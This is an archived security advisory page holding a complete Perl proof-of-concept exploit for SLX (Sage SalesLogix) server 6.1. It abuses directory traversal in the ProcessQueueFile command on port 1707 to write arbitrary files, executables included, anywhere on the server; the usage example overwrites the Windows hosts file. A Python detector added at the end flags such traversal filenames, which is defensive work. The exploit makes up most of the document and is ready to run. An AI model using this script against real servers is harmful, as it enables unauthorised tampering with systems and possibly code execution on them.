SLX server 6.1 Proof of concept exploit
Source: Agenda Security Services  Author: Carl  Published: 2004-10-19

#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2004.
#
# This exploit abuses the ProcessQueueFile command on SLX 6.1 (others?) servers
# to create arbitrary files on the filesystem of the SLX server. By using
# directory traversal, it is possible to escape from the Queue directory and
# write anywhere on the SLX server's filesystem.
#

use IO::Socket;

print "slx_uploader - Uploads arbitrary files to Sage SalesLogix servers.\n";
print "By Carl Livitt @ Agenda Security Services, June 2004\n\n";

if($#ARGV!=2) {
    print "Syntax: $0 host filename_to_create file_to_upload\n\n";
    print "Example:\n";
    print " $0 10.0.0.100 \\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts evil.txt\n\n";
    print "The above example would upload the local file 'evil.txt' to the SLX\n";
    print "server on 10.0.0.100, overwriting the existing hosts file.\n";
    print "It is possible to upload binary files, e.g. executables, with this exploit.\n\n";

    exit(1);
} else {
    $host=$ARGV[0];
    $create_file=$ARGV[1];
    $upload_file=$ARGV[2];
}

if((stat($upload_file))[7] > 4096) {
    print "[*] Error! Files to be uploaded must be less than 4k in size.\n\n";
    exit(1);
}

print "[+] Building payload\n";
$contentLen=43 + length($create_file);
$exploit="\x00"x10 . chr($contentLen) . "\x00"x3 .
"ProcessQueueFile\x00" . "..\\"x8 . "$create_file" . "\x00"x6;

open(UPLOAD, '<', $upload_file) || die "Could not open local file $upload_file\n";

while(($line=<UPLOAD>)) {
$exploit.=$line;
}

close(UPLOAD);

print "[+] Connecting to server $host:1707\n";
$sock=IO::Socket::INET->new("$host:1707") || do {print "[-] Could not connect to server\n"; exit(1); };

print "[+] Sending exploit payload\n";
send($sock,$exploit,0);

print "[+] Waiting for response\n";
$sock->recv($data,1024,0);

if($data =~ /Received/) {
print "[+] Exploit successful\n";
} else {
print "[*] Exploit may not have worked.\n";
}

$sock->shutdown(2);
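
A defensive check for the traversal described in the script's header comment, as an added example that is not part of the original post: it parses the request layout the script builds (14-byte header, `ProcessQueueFile\0`, NUL-terminated filename) and reports whether the filename would resolve outside the queue directory. The queue path `C:\SLX\Queue` and all function names are assumptions; the length byte is not interpreted because the page does not define it.

```python
import ntpath  # Windows path rules, usable on any host OS

COMMAND = b"ProcessQueueFile\x00"
HEADER_LEN = 14  # 10 NULs + 1 length byte + 3 NULs, per the script above


def extract_queue_filename(payload: bytes):
    """Return the filename field of a ProcessQueueFile request, or None."""
    start = HEADER_LEN + len(COMMAND)
    if len(payload) < start or payload[HEADER_LEN:start] != COMMAND:
        return None
    end = payload.find(b"\x00", start)
    if end == -1:
        end = len(payload)
    return payload[start:end].decode("latin-1")


def is_unsafe_queue_filename(filename: str, queue_dir: str = r"C:\SLX\Queue") -> bool:
    """True if filename would not resolve to a path strictly inside queue_dir.

    queue_dir is an assumed location; the page does not name the real one.
    """
    # Drive letters, UNC prefixes and rooted paths ignore the base directory.
    if ntpath.splitdrive(filename)[0] or filename.startswith(("\\", "/")):
        return True
    base = ntpath.normcase(ntpath.normpath(queue_dir))
    # normpath collapses "..\" and doubled separators lexically.
    target = ntpath.normcase(ntpath.normpath(ntpath.join(base, filename)))
    return not target.startswith(base + "\\")


def classify(payload: bytes) -> str:
    """Verdict for one captured request on the SLX port (1707 on this page)."""
    name = extract_queue_filename(payload)
    if name is None:
        return "not-processqueuefile"
    return "reject" if is_unsafe_queue_filename(name) else "allow"


def constructed_request(name: bytes) -> bytes:
    # Constructed sample input in the layout above; header bytes left as zero.
    return b"\x00" * HEADER_LEN + COMMAND + name + b"\x00" * 6 + b"file body"


if __name__ == "__main__":
    for n in (b"batch_0001.que", b"..\\" * 8 + b"winnt\\system32\\drivers\\etc\\hosts"):
        print(n, "->", classify(constructed_request(n)))
```

The same `is_unsafe_queue_filename` check applies on the server side before any file is opened, or in a sensor inspecting traffic to the service.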



 